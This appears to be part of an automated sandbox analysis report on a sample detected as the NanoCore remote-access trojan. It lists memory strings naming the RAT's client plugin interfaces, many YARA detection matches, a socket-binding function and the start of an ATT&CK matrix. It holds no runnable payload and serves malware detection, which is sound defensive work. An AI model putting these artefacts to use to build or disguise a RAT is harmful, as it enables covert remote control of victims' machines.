      Source: ihgsvw.exe, 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C22163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00C22163

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts111
      Scripting      		1
